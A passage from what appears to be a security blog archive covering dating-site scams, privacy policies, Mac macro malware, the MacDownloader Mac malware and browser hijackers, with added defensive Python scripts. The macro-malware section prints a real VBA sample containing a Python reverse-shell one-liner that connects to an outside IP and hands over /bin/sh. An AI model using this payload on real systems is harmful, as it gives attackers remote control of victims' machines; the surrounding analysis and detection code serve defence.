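        if marker == 0xD9:                       # EOI: no length, nothing follows
            yield marker, pos, pos + 2
            return
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        end = pos + 2 + length
        yield marker, pos, end
        if marker == 0xDA:                       # SOS: scan data follows
            return
        pos = end


def exif_tags(payload):
    """Tag IDs present in IFD0 of an Exif APP1 payload (empty set otherwise)."""
    if not payload.startswith(EXIF_PREFIX):
        return set()
    tiff = payload[len(EXIF_PREFIX):]
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if endian is None:
        return set()
    ifd0 = struct.unpack(endian + "I", tiff[4:8])[0]
    count = struct.unpack(endian + "H", tiff[ifd0:ifd0 + 2])[0]
    return {struct.unpack(endian + "H", tiff[ifd0 + 2 + 12 * i:ifd0 + 4 + 12 * i])[0]
            for i in range(count)}


def has_gps(data):
    """True if any Exif segment's IFD0 points at a GPS IFD."""
    return any(marker == 0xE1 and GPS_IFD_TAG in exif_tags(data[start + 4:end])
               for marker, start, end in segments(data))


def strip_exif(data):
    """Return a copy of the JPEG with every APP1/Exif segment removed."""
    out = bytearray(data[:2])
    last = 2
    for marker, start, end in segments(data):
        if marker == 0xE1 and data[start + 4:end].startswith(EXIF_PREFIX):
            continue                              # drop the whole segment
        out += data[start:end]
        last = end
    out += data[last:]                            # scan data and EOI, untouched
    return bytes(out)


def build_sample_jpeg():
    """Constructed sample: SOI, JFIF APP0, Exif APP1 (Make + GPS IFD pointer,
    little-endian TIFF), SOS header, EOI. No real image data."""
    make = b"Acme\x00"
    ifd0_off = 8                                  # IFD0 right after the TIFF header
    data_off = ifd0_off + 2 + 2 * 12 + 4          # Make string after the 2 entries
    gps_off = data_off + len(make)
    ifd0 = (struct.pack("<H", 2)
            + struct.pack("<HHII", 0x010F, 2, len(make), data_off)   # Make, ASCII
            + struct.pack("<HHII", GPS_IFD_TAG, 4, 1, gps_off)       # GPSInfo, LONG
            + struct.pack("<I", 0))                                   # no next IFD
    gps_ifd = (struct.pack("<H", 1)
               + struct.pack("<HHI4s", 0x0001, 2, 2, b"N\x00\x00\x00")  # GPSLatitudeRef
               + struct.pack("<I", 0))
    tiff = b"II" + struct.pack("<HI", 42, ifd0_off) + ifd0 + make + gps_ifd

    def seg(marker, payload):
        return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

    jfif = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\x01\x01\x00\x00\x3f\x00"
    return (b"\xff\xd8" + seg(0xE0, jfif) + seg(0xE1, EXIF_PREFIX + tiff)
            + seg(0xDA, sos) + b"\xff\xd9")


if __name__ == "__main__":
    photo = build_sample_jpeg()
    print("GPS before:", has_gps(photo), "after:", has_gps(strip_exif(photo)))
```

Run it against a real photo by reading the file in binary mode, passing the bytes to has_gps and strip_exif, and writing the result to a new file; keep the original until you have confirmed the stripped copy still opens.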
You'll find some additional practical advice in terms of real world security on the Selfie Security blog we posted a few weeks ago. You should pay particular attention to not including location specific items in your photograph(s) such as bills with your address on them.
2. Hang on to your moneybags: social engineering tactics
Scammers setting up fake profiles and then asking for money is astonishingly common, and it's all too easy to be taken to the cleaners as a result. Just like 419 scams, romance fakers often use templates, or just lazily cut and paste bot spam to reuse for their own purposes, so fans of dating sites should get into the habit of Googling common phrases, just to see if someone else is saying the same thing. If a wave of Susan J. Fakenames are posting identical romantic overtures on six different sites, you can be sure it's time to move along.
With regard to common scam angles, watch out for anything related to:
On a related note, don’t ever let strangers send money to your bank account for any reason. They’ll probably get you to forward the cash on to someone else, and at that point, you’ve become a money mule.
That’s a criminal offence and will get you into trouble, by the way.

3. “Check out my other profile…”
Be cautious around links sent your way which direct you to another website, and be particularly careful around links to downloadable files. Scammers will often try to remove you from the relative safety of the service you happen to be using, directing you to links and files that the dating site you started on can’t hope to police. That’s been a staple attack on social media sites for many a year, but it works with dating too.
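An added example of expanding a link before you trust it, not code from the original post: it follows 3xx Location hops with HEAD requests (so the destination page is never actually fetched), caps the number of hops, stops on a loop, and flags a final URL that looks like a downloadable file. The redirect chain at the bottom (reserved `.example` hosts) is constructed so the demo runs offline; `head_location` is the fetcher you would pass for a real lookup.

```python
import http.client
from urllib.parse import urljoin, urlsplit

DOWNLOAD_SUFFIXES = (".exe", ".msi", ".scr", ".dmg", ".pkg", ".zip", ".rar", ".jar", ".js", ".apk")


def head_location(url, timeout=5):
    """One HEAD request; returns (status, Location header or None). http.client does not
    follow redirects on its own, so the destination page is never retrieved."""
    parts = urlsplit(url)
    cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = cls(parts.netloc, timeout=timeout)
    path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
    try:
        conn.request("HEAD", path, headers={"User-Agent": "link-check/1.0"})
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()


def expand_url(url, fetch=head_location, max_hops=5):
    """Walk 3xx hops by hand. Returns (chain, reason): chain starts with the input URL,
    reason is 'final' (a non-redirect was reached), 'loop' or 'max_hops'."""
    chain, seen = [url], {url}
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if not 300 <= status < 400 or not location:
            return chain, "final"
        nxt = urljoin(chain[-1], location)  # Location may be relative to the current hop
        if nxt in seen:
            return chain + [nxt], "loop"
        seen.add(nxt)
        chain.append(nxt)
    return chain, "max_hops"


def looks_like_download(url):
    return urlsplit(url).path.lower().endswith(DOWNLOAD_SUFFIXES)


# Constructed redirect chain (shortener -> tracker -> relative hop -> file), not real hosts.
FAKE_CHAIN = {
    "https://short.example/abc": (301, "https://tracker.example/r?x=1"),
    "https://tracker.example/r?x=1": (302, "/go/final"),
    "https://tracker.example/go/final": (302, "https://dl.example/Photos.zip.exe"),
    "https://dl.example/Photos.zip.exe": (200, None),
}


def fake_head(url):
    return FAKE_CHAIN.get(url, (404, None))


if __name__ == "__main__":
    chain, reason = expand_url("https://short.example/abc", fetch=fake_head)
    print(" -> ".join(chain), "(%s)" % reason)
    if looks_like_download(chain[-1]):
        print("WARNING: link ends at a downloadable file")
```

Even a HEAD request tells the link's owner that someone resolved it, so do this from a machine and network you do not mind associating with the lookup.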
If someone sends you shortened URLs, you can usually expand them to see where they end up without visiting the destination. If you’re still not sure, try googling the link. If nothing comes up to allow you to make an informed decision, just ignore whatever you’ve been sent; it isn’t worth the risk.

4. Remove that personal info
Don’t put your real name / age / location in your profile, email or anything else related to the dating site you’re on. Anonymous usernames are fine. You should also use a disposable email address when you sign up to a new dating service – not only will this keep people you’d rather not stay in touch with away from your main mailbox, it’ll also be obvious if a dating site decides to sell your email to spammers. This is a good trick to use outside of online dating, too.

5. Bots! Bots everywhere!
If you have an open private message system, you’ll likely receive many, many messages from people wanting to chat. Some dating websites will also send multiple daily messages to users via email claiming that persons x, y, and z would like to talk to you. They may even ask about cookie dough (and it better be delicious considering the eventual $118.76 monthly fee). Most dating bots will cycle through a canned script of a dozen or so phrases before claiming you need to be “verified” in some way. This will inevitably lead to a request for payment information. Don’t do it – if in doubt, contact the service you’re using and ask them about it directly. You’ve probably seen examples of this on blogs about Skype spam.
Bots will advertise everything from pornography to mobile games, and spammers commonly use images ripped from the net for their profile avatars. You can try and see if the picture is a stock photo by using the “Search Google for this image” option in your browser, or fire up TinEye to see what’s out there.
Bot accounts probably won’t have a realistic looking bio, or have links to profiles on popular social networks. If it looks cookie-cutter, there’s a good chance it might be. Feel free to see if they pop up across the web anyway and you’ll quickly learn if they’re one of a kind or part of a wave of identikit bots.

6. “Got any pics?”
Be wary of people asking for intimate photographs and / or video, as this is a surefire way to find yourself blackmailed into handing over lots of money. If you do pay the blackmailer, there’s no guarantee the images won’t be leaked anyway. There’s also the issue of revenge porn to consider, and the legal issues that will inevitably arise as a result.
Put simply: don’t do it.
Hopefully the above will help to keep you out of trouble while swiping left (or right? I have no idea), and here’s to a safe online Valentine’s Day experience for everybody.
Last November, I gave a talk in Ireland at the fantastic IRISSCON, a huge annual security conference which covers everything from social engineering and use of language to the criminal underground and heart hacking.
My talk was all about EULAs, or at least, it used EULAs as a starting point before quickly moving into the land of mobile and the crazy assortment of Privacy Policies on offer.
The EULA is an End User License Agreement and generally sets out things like your ability to use, copy (or indeed, not copy) the product sitting in front of you. More often than not there will also be Terms of Service, which explain what you can do while using the product, a sort of “what you can reasonably expect to take place while the wheels are in motion”. These can matter more on mobile, where apps and software as a service reign supreme, than on the desktop.
Where this gets interesting is that Privacy Policies are typically all about the adverts, tracking, and analytics you can expect to run into on your travels. Just like websites, ads are usually how free games make their money, regardless of whether or not they also use in-app purchases. I’ve written about Advergaming many times; here are five blogs for you to get your teeth into:
Previously, device owners could try and bypass adverts on their devices through all manner of antics – here’s people using OpenDNS to block Xbox dashboard ads – so it was inevitable that adverts would eventually become something you can’t get around anymore. Behold, the advert as a game mechanic:
Yeah, there’s no way to dodge that. There’s a weird grey area where parents let their kids download / play all manner of things on their devices, or buy tablets specifically for the children to use, so they’re “theirs” but the data on the device is a mashup of both parent and child. Some games need registration, logins, permission from an adult over 13 years of age and so on. With that in mind, it’s quite important to ensure you know where your data is going, which is probably why Privacy Policies are such a big deal.
I’m not sure how many successful EULA challenges have passed muster in a court of law, but anything involving leakage, theft or bad things in general related to PII never tends to go well for the offending party. That’s probably why we end up with such a headache when trying to deal with companies attempting to cover themselves from unwarranted blame, because that way lies madness – and lots of words.

The problem with words
Unfortunately, this isn’t possible.
Most mobile games make use of multiple advertisers/networks, and some are region specific so what you see in country A won’t be what you see in country B. As a result, you end up flowing down a river of “here’s two more links to two more policies – and both of those links to some of their partners, so here’s a few more – and this – and that – and one of these”.
Here is your 2017 experience:
Incredibly important information about what’s happening to your data is often not placed in the app itself, because the app maker wants you to get right into the act of making them some money and tons of words would be a bit of a distraction, and worse still, the app maker is relying on the ad network/provider/whoever to actually have the correct information available, online, in an easy to digest format. Effectively, you’re seeing a EULA at app launch, but the PII references are all sitting on a website somewhere – or, even more confusingly, a whole bunch of third-party websites.
Did you read it all? Of course you did.
At time of writing (well, at time of putting together the slide deck) the top games on the Play store were as follows:
Taps to Riches: 1245 words
Block! Hexa Puzzle: 678 words
Rolling Sky: 586 words
Essentially, if it’s decided that the app doesn’t handle what is considered to be PII, then it doesn’t need to list anything. You can see the problem here; without any form of information whatsoever with regards what the app is doing with said data (outside of notifications related to what device functions it may make use of), there is no way for the consumer to make an informed decision.
Elsewhere, we have Privacy Policies ranging from 500 words to just over 2,000. There are various readability tests which try to establish how complicated a piece of text is: some apply a formula (to sentence length and syllable counts, for instance), some look at what percentage of words have seven or more letters, and some compare the whole text against a list of a couple of thousand “common” words, raising the complexity score every time a word appears that isn’t on the list.
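To make the three kinds of readability test concrete, here is an added example (not from the talk or the original post) that applies all three to a constructed two-sentence privacy-policy snippet: the Flesch reading-ease formula, the share of words with seven or more letters, and the share of words missing from a “common words” list. The syllable counter is a vowel-group heuristic and the common-word list is a tiny constructed stand-in for the few-thousand-word lists real tests use, so treat the numbers as illustrative.

```python
import re

# Constructed, deliberately tiny stand-in for a "common words" list.
COMMON_WORDS = {"we", "may", "share", "your", "with", "our", "use", "the", "and", "to",
                "of", "a", "in", "for", "you", "information"}
LONG_WORD_LEN = 7


def words_of(text):
    return re.findall(r"[A-Za-z']+", text)


def sentences_of(text):
    return [s for s in re.split(r"[.!?]+", text) if s.strip()]


def count_syllables(word):
    """Heuristic: count vowel groups, minus one for a silent trailing 'e' (but not '-le')."""
    w = re.sub(r"[^a-z]", "", word.lower())
    if not w:
        return 0
    groups = len(re.findall(r"[aeiouy]+", w))
    if w.endswith("e") and not w.endswith("le") and groups > 1:
        groups -= 1
    return max(1, groups)


def readability(text, common=COMMON_WORDS):
    """Three complexity measures over one text: a formula, a long-word ratio, a vocabulary check."""
    words = words_of(text)
    n_words = len(words)
    n_sents = max(1, len(sentences_of(text)))
    syllables = sum(count_syllables(w) for w in words)
    long_words = sum(1 for w in words if len(w) >= LONG_WORD_LEN)
    uncommon = sum(1 for w in words if w.lower() not in common)
    # Flesch reading ease: higher is easier; 60-70 is "plain English", below 30 is academic.
    flesch = 206.835 - 1.015 * (n_words / n_sents) - 84.6 * (syllables / n_words)
    return {
        "words": n_words,
        "sentences": n_sents,
        "syllables": syllables,
        "flesch_reading_ease": round(flesch, 2),
        "long_word_pct": round(100.0 * long_words / n_words, 1),
        "uncommon_word_pct": round(100.0 * uncommon / n_words, 1),
    }


# Constructed sample; not quoted from any real policy.
SAMPLE_POLICY = ("We may share your information with our advertising partners. "
                 "Partners may use cookies.")

if __name__ == "__main__":
    for key, value in readability(SAMPLE_POLICY).items():
        print("%-20s %s" % (key, value))
```

Feed `readability()` the full text of a policy you pulled from an app's website to compare it against the word counts listed above; the three measures do not always agree, which is rather the point.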
Unfortunately, in certain circumstances there may just be too many words to deal with to gain a firm understanding of exactly what you happen to be dealing with. In the follow-up post, you’ll see exactly what I mean.
Bring some background music, a soft bedside light and a large pair of reading glasses.
You’ll need them.
Macro malware – commonly known as a “Word macro virus” – involves maliciously-crafted Microsoft Office documents containing Visual Basic macros. These things have been around for quite some time, but have mostly just been a nuisance to Mac users. Unfortunately, that has now changed.
Historically, Microsoft Office for Mac supported macros up through the 2004 edition and was thus susceptible to macro malware. Such malware was mostly targeted at Windows users, however, and for the most part did little to Mac users other than potentially infecting their “normal” template, the template from which all new blank documents are created. Future documents created on that computer would then carry the macro malware, which could be passed on to others.
Then Microsoft released Office for Mac 2008, which removed macro support. This upset a lot of long-time professional users of Office for Mac, who made use of macros. However, this was a move that security-savvy Mac users celebrated, as it made Macs immune to macro malware.
In 2011, a new version of Office for Mac ushered the macro back in. Fortunately, it also brought a setting to warn the user if a document containing macros was being opened.
This setting, which was on by default, did a lot to prevent a new rise of macro malware on the Mac, while allowing macro-loving Mac users to upgrade from Office for Mac 2004.
Macro malware has been off most Mac users’ radar for some time. Even as a security expert, I rarely come across such malware these days. However, that all changed recently, when a malicious Word document was found targeting Mac users.
Notable Mac security expert Patrick Wardle provided an excellent analysis of the malware. I can’t improve on what he said, but in essence, the malware would first check for the presence of Little Snitch, a well-known Mac outgoing firewall.
If Little Snitch was present, it would bail out. Otherwise, it would download and install a second-stage component (which was no longer available) and set it to run persistently, via one of several Mac-specific persistence methods.
Another sample of macro malware, which was found shortly after, attempts to connect via reverse shell to a malicious server, first on Windows, but then trying with Mac code if that fails:

```vb
Function macshell()
    ' Suppress and clear any VBA error so a failure leaves no visible trace
    On Error Resume Next
    Err.Clear
    ' AppleScript "do shell script" runs a Python one-liner: connect to the attacker's
    ' server on port 53, wire stdin/stdout/stderr to the socket, hand it an interactive /bin/sh
    scriptToRun = "do shell script ""python -c 'import urllib2,socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\""18.104.22.168\"",53)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' &"""
    ' MacScript hands the AppleScript to the system; the trailing & backgrounds the shell
    res = MacScript(scriptToRun)
End Function
```
This brings up questions of how Mac users can protect themselves against this kind of threat. Fortunately, it’s not difficult. First and foremost, you should exercise caution before opening any Office document from untrustworthy sources, such as an e-mail from a stranger or an unfamiliar website.
If you do need to open a document, the “Warn before opening a file that contains macros” setting, which was mentioned previously, should be turned on by default. It would be wise, however, to verify this, by going to the Security & Privacy settings in the preferences for Word, Excel, and PowerPoint and turning it on if it isn’t already.
With this setting on, trying to open a document containing macros will display a warning.
The default is to open the document with macros disabled, which prevents the malware from triggering. If you have any questions about the legitimacy of the document, or if you know of no reason why it should contain any macros, you should not click the Enable Macros button!
If you’re paying attention and have not disabled the ability of your Office apps to protect you, it will be difficult or impossible for this kind of malware to infect you. However, there are invariably those who will fall prey to the social engineering used by these fake documents and who will re-open them with macros enabled.
Don’t be one of those people, and pass this information on to those you know who might be fooled.
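An added triage check (not from the original post) to go with the advice above: before opening a document, tell whether it contains a VBA project at all. OOXML files (.docm, .xlsm, and a .docx someone renamed) are zips, so the check looks for a vbaProject.bin part and for the VBA content type in [Content_Types].xml; legacy OLE files (.doc, .xls) are only scanned for the UTF-16LE stream names a VBA project leaves behind, which is a heuristic and can be evaded. It does not decompress or interpret the macro code itself; for that, use a dedicated tool such as olevba. The sample documents are constructed skeletons, not real Office files.

```python
import io
import zipfile

VBA_CONTENT_TYPE = b"application/vnd.ms-office.vbaProject"
OLE_SIGNATURE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# Stream/storage names a VBA project leaves in a legacy OLE file; CFB stores names as UTF-16LE.
OLE_VBA_MARKERS = ("_VBA_PROJECT", "Macros")


def macro_indicators(blob):
    """Reasons this Office document looks macro-capable ([] means none found).
    Raises ValueError for anything that is neither an OOXML zip nor an OLE file."""
    reasons = []
    if blob[:4] == b"PK\x03\x04":
        with zipfile.ZipFile(io.BytesIO(blob)) as z:
            names = z.namelist()
            vba_parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
            if vba_parts:
                reasons.append("vbaProject part(s): %s" % ", ".join(vba_parts))
            if "[Content_Types].xml" in names and VBA_CONTENT_TYPE in z.read("[Content_Types].xml"):
                reasons.append("content type declares a VBA project")
    elif blob[:8] == OLE_SIGNATURE:
        hits = [m for m in OLE_VBA_MARKERS if m.encode("utf-16-le") in blob]
        if hits:
            reasons.append("OLE file contains VBA markers: %s" % ", ".join(hits))
    else:
        raise ValueError("not an OOXML zip or an OLE compound file")
    return reasons


def build_sample_ooxml(with_macro):
    """Constructed minimal OOXML skeleton (not a real Word file), with or without a VBA part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        types = ['<?xml version="1.0"?>',
                 '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
                 '<Default Extension="xml" ContentType="application/xml"/>']
        if with_macro:
            types.append('<Override PartName="/word/vbaProject.bin" '
                         'ContentType="application/vnd.ms-office.vbaProject"/>')
        types.append("</Types>")
        z.writestr("[Content_Types].xml", "".join(types))
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", OLE_SIGNATURE + b"\x00" * 64)
    return buf.getvalue()


# Constructed OLE-like blob: the CFB signature plus one UTF-16LE stream name, enough for the heuristic.
SAMPLE_OLE = OLE_SIGNATURE + b"\x00" * 16 + "_VBA_PROJECT".encode("utf-16-le") + b"\x00" * 8

if __name__ == "__main__":
    samples = (("macro.docm", build_sample_ooxml(True)),
               ("plain.docx", build_sample_ooxml(False)),
               ("legacy.doc", SAMPLE_OLE))
    for label, blob in samples:
        print(label, "->", macro_indicators(blob) or "no macro indicators")
```

A document that reports indicators is not necessarily malicious, but if you had no reason to expect macros in it, that is exactly the case where you should not click Enable Macros.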
Researchers Claudio Guarnieri and Collin Anderson recently discovered new Mac malware, which they have dubbed MacDownloader. They report that this malware appears to be the work of Iranian hackers and is targeting US defense contractors, such as Lockheed Martin, Sierra Nevada Corporation, Raytheon, and Boeing.
The malware was first found on a spearphishing site, claiming to offer “Special Programs and Courses” to interns at these companies. The site showed a “broken video,” using the common trick of claiming that Adobe Flash Player was outdated and offering a link to a “Flash installer.”
That “Flash installer” was the malware dropper, although, as we’ll see, “dropper” may not be a very accurate term. The installer was a simple app named “addone flashplayer” with a Flash icon. (SHA256: 52efcfe30f96a85c9c068880c20663db64f0e08346e0f3b59c2e5bbcb41ba73c)
When run, the malware immediately opens a window offering to install the update.
To those who know better, this doesn’t really look much like an actual Adobe Flash Player installer, but many people won’t realize that. There are some other red flags as well, such as some odd phrasing and other errors in the text shown.
The biggest red flag, though, is the name of the application shown in the menu bar next to the Apple menu. As can be seen from the screenshot above, it claims to be Bitdefender Adware Removal Tool. This is the first sign of a serious split personality issue in this malware, which can’t seem to decide whether it’s a Flash installer or an anti-adware program.
Interestingly, if the user clicks the Close button here the malware quits without doing anything else. That’s highly unusual for malware and is likely to be a sign of the poor coding that Guarnieri and Anderson mention in their analysis.
If the user chooses to proceed with the “update,” the malware will then show a rather odd window for what is supposed to be a Flash updater: a claim to have detected malware.
Again, there are some issues with phrasing and spacing in the text of this alert, not to mention the fact that a Flash updater should not be scanning your system like anti-virus software. (There’s also the fact that it calls iWorm “adware,” when it’s actually old malware, but the average user won’t know that there’s anything wrong with that.)
Guarnieri and Anderson believe that this malware was probably originally developed as a fake anti-virus app and hastily or sloppily repurposed into the form of a fake Flash updater, having found other evidence in the app that it was designed to imitate Bitdefender.
After clicking OK here, the user is asked for a password because “System Preferences wants to access from current application.”
At this point, many people will be extremely suspicious. Fortunately, if the user decides to cancel at this point, the app will again exit without doing anything else.
If a password is entered, the app will then gather some information about the system and write it to /tmp/applist.txt. This file and the user’s keychains are then uploaded to the command and control (C&C) server. Since the applist.txt file contains the user’s username and password, thanks to the password request, this would allow the hackers to unlock the keychain files, accessing all the passwords stored within. (Fortunately, the C&C server is now offline.)
The malware appears to contain code designed to download a payload from the C&C server and install it persistently, but Guarnieri and Anderson found that bugs prevented that code from working properly. Thus, MacDownloader does not install anything persistently: once it has run, it’s done.
This malware continues the recent malware trends on macOS. In the past year, nearly all true Mac malware (as opposed to adware) has been 1) lame and 2) targeted.
Mac malware has a historical tendency towards lameness, not necessarily because the code itself is poor (though that’s often the case), but because it always uses the same old boring method of persistence: a launch agent/daemon that loads a hidden process. This makes Mac malware easy to spot and easy to remove.
In the case of MacDownloader, the malware takes “lame” to a new level, with poor code, sloppy UI, and non-functional persistence. (Though perhaps it should be given a little extra credit for trying, albeit unsuccessfully, to use an older persistence technique involving rc.common, which most people would not be looking for.)
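Because the persistence methods named above (launchd agents and daemons, plus the older rc.common trick) are where this kind of malware shows up, here is an added hunting script, not part of the original analysis: it lists launchd plists whose program runs from a temp directory, a hidden path or a relative path, and reports lines in /etc/rc.common that launch something from a user or temp path. The “odd path” rules and the rc.common pattern are assumptions for the example, and the sample filesystem it builds under a temp directory is constructed; point `root` at a mounted disk image to use it on a real system.

```python
import os
import plistlib
import re
import tempfile

LAUNCHD_DIRS = ("Library/LaunchAgents", "Library/LaunchDaemons",
                "System/Library/LaunchAgents", "System/Library/LaunchDaemons")
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/var/folders/")
# Assumption: the stock rc.common only defines shell functions, so a line that launches
# something from a user or temp path, or backgrounds a command, is an addition.
RC_COMMON_SUSPECT = re.compile(r"(/tmp/|/Users/|/\.[A-Za-z0-9_]|\bnohup\b|&\s*$)")


def _launchd_plists(root):
    """Every .plist in the system launchd folders and in each user's LaunchAgents."""
    dirs = [os.path.join(root, d) for d in LAUNCHD_DIRS]
    users = os.path.join(root, "Users")
    if os.path.isdir(users):
        dirs += [os.path.join(users, u, "Library", "LaunchAgents") for u in sorted(os.listdir(users))]
    for d in dirs:
        if os.path.isdir(d):
            for name in sorted(os.listdir(d)):
                if name.endswith(".plist"):
                    yield os.path.join(d, name)


def _program_of(plist):
    args = plist.get("ProgramArguments") or []
    return plist.get("Program") or (args[0] if args else "")


def _odd_program(path):
    """Heuristic reasons a launchd program path deserves a look (assumptions, not rules)."""
    reasons = []
    if path.startswith(TEMP_PREFIXES):
        reasons.append("runs from a temp directory")
    if any(p.startswith(".") for p in path.split("/") if p):
        reasons.append("hidden path component")
    if not path.startswith("/"):
        reasons.append("relative program path")
    return reasons


def suspicious_launch_items(root="/"):
    """[(plist path, [reasons])] for launchd jobs whose program path looks odd."""
    findings = []
    for path in _launchd_plists(root):
        try:
            with open(path, "rb") as f:
                plist = plistlib.load(f)
        except Exception as exc:  # a plist launchd cannot parse is itself worth a look
            findings.append((path, ["unparseable plist: %s" % exc]))
            continue
        reasons = _odd_program(_program_of(plist))
        if reasons and (plist.get("RunAtLoad") or plist.get("KeepAlive")):
            reasons.append("starts automatically (RunAtLoad/KeepAlive)")
        if reasons:
            findings.append((path, reasons))
    return findings


def rc_common_additions(root="/"):
    """[(line number, line)] for non-comment lines in /etc/rc.common that launch something."""
    path = os.path.join(root, "etc", "rc.common")
    if not os.path.exists(path):
        return []
    with open(path, errors="replace") as f:
        return [(n, line.strip()) for n, line in enumerate(f, 1)
                if line.strip() and not line.strip().startswith("#")
                and RC_COMMON_SUSPECT.search(line.strip())]


def build_sample_root():
    """Constructed fake macOS root: one benign daemon, one agent from a hidden user path,
    and an rc.common with a launch line appended. Returns the temp directory."""
    root = tempfile.mkdtemp(prefix="fakemac-")
    agents = os.path.join(root, "Users", "alice", "Library", "LaunchAgents")
    daemons = os.path.join(root, "Library", "LaunchDaemons")
    for d in (agents, daemons, os.path.join(root, "etc")):
        os.makedirs(d)
    with open(os.path.join(agents, "com.apple.update.plist"), "wb") as f:
        plistlib.dump({"Label": "com.apple.update", "RunAtLoad": True,
                       "ProgramArguments": ["/Users/alice/.client/update", "-s"]}, f)
    with open(os.path.join(daemons, "com.vendor.helper.plist"), "wb") as f:
        plistlib.dump({"Label": "com.vendor.helper", "KeepAlive": True,
                       "Program": "/Library/PrivilegedHelperTools/com.vendor.helper"}, f)
    with open(os.path.join(root, "etc", "rc.common"), "w") as f:
        f.write("#!/bin/sh\n# stock helper functions\nConsoleMessage() { echo \"$@\"; }\n"
                "/Users/alice/.client/update &\n")
    return root


if __name__ == "__main__":
    sample = build_sample_root()
    for path, reasons in suspicious_launch_items(sample):
        print(path, "->", "; ".join(reasons))
    for n, line in rc_common_additions(sample):
        print("rc.common:%d: %s" % (n, line))
```

An Apple-looking label such as com.apple.update in a user's LaunchAgents folder is a second tell the script does not score; Apple's own agents live under /System/Library.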
Most Mac malware in recent years, with a few exceptions, have been targeted attacks. Such attacks have targeted human rights advocates, government agencies, research institutions, and others. This malware is no different, as it is being used to target US defense contractors via spearphishing, a technique in which links to specially-crafted malicious sites are sent to targeted individuals or groups via e-mail or other messaging services.
The majority of Mac users will never see this malware and one would hope that most of those who do would not be fooled by the clumsy behavior. Still, it doesn’t take many to fall for the tricks employed by this malware to get access to sensitive accounts within an organization, which can be used to pwn the entire company.
There is a large family of Spigot browser hijackers that all have a lot in common. So by giving you a description of them we hope this will help you to avoid any similar and new ones that might come along.

Targeted browsers
Some, but not all, browser hijackers in this family come with extensions for Firefox and Google Chrome. In Internet Explorer they change the default Search Provider and the start page. Trying to install the PUP on Edge gets you nothing but an “Unsupported Browser” notice.
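An added example (not from the original post) of checking the two Internet Explorer settings this family changes, working from a `reg export` of the user's hive rather than the live registry: it parses the .reg text, reads `Start Page` under Internet Explorer\Main and the `DefaultScope` entry under SearchScopes, and reports either when its host is not on an expected list. The expected-host list and the sample export (with a made-up hijack domain under the reserved `.test` TLD) are constructed for the demonstration.

```python
import re

IE_MAIN = r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main"
IE_SCOPES = r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes"
# Assumption for this example: hosts a normal start page or search provider would live on.
EXPECTED_HOSTS = ("www.bing.com", "www.google.com", "duckduckgo.com", "www.msn.com")

_VALUE = re.compile(r'"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')  # "name"="REG_SZ value"


def parse_reg_export(text):
    """Parse the REG_SZ values of a .reg export into {key path: {value name: value}}.
    DWORD/hex values are skipped; escaped quotes and backslashes are unescaped."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"'):
            m = _VALUE.match(line)
            if m:
                name, value = (s.replace("\\\\", "\\").replace('\\"', '"') for s in m.groups())
                keys[current][name] = value
    return keys


def _host(url):
    m = re.match(r"https?://([^/:?#]+)", url, re.I)
    return m.group(1).lower() if m else ""


def ie_hijack_report(reg_text, expected=EXPECTED_HOSTS):
    """[(setting, url)] for the IE start page and default search provider when either
    points at a host outside `expected`."""
    keys = parse_reg_export(reg_text)
    report = []
    start = keys.get(IE_MAIN, {}).get("Start Page")
    if start and _host(start) not in expected:
        report.append(("Start Page", start))
    default = keys.get(IE_SCOPES, {}).get("DefaultScope")
    scope = keys.get(IE_SCOPES + "\\" + default, {}) if default else {}
    url = scope.get("URL")
    if url and _host(url) not in expected:
        report.append(("Default search provider (%s)" % scope.get("DisplayName", default), url))
    return report


# Constructed export, shaped like the output of
#   reg export "HKCU\Software\Microsoft\Internet Explorer" ie.reg
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://search.hijack-example.test/?src=home"
"Search Page"="http://www.bing.com/search"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{11111111-2222-3333-4444-555555555555}"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{22222222-3333-4444-5555-666666666666}]
"DisplayName"="Bing"
"URL"="http://www.bing.com/search?q={searchTerms}"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{11111111-2222-3333-4444-555555555555}]
"DisplayName"="Web Search"
"URL"="http://search.hijack-example.test/search?q={searchTerms}"
"""

if __name__ == "__main__":
    for setting, url in ie_hijack_report(SAMPLE_REG):
        print("%s -> %s" % (setting, url))
```

`reg export` writes UTF-16 with a BOM, so open a real export with `encoding="utf-16"` before passing its text in.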
Recognizing the sites
The websites where these hijackers can be downloaded will show you the EULA, explaining to you, “the User”, what the downside of installing “the Software” might be.
The Software is a free desktop application that offers you direct links to websites from your new preferred homepage and saves your new preferred home page and/or new tab page. When we set your Browser’s settings using the Software, they will be saved automatically on Chrome™, Firefox®, and Internet Explorer®. As part of the installation process of the Software, we may change your Internet Browser settings and/or provide you with the ability to opt to make changes to your Internet Browser settings.

Download locations
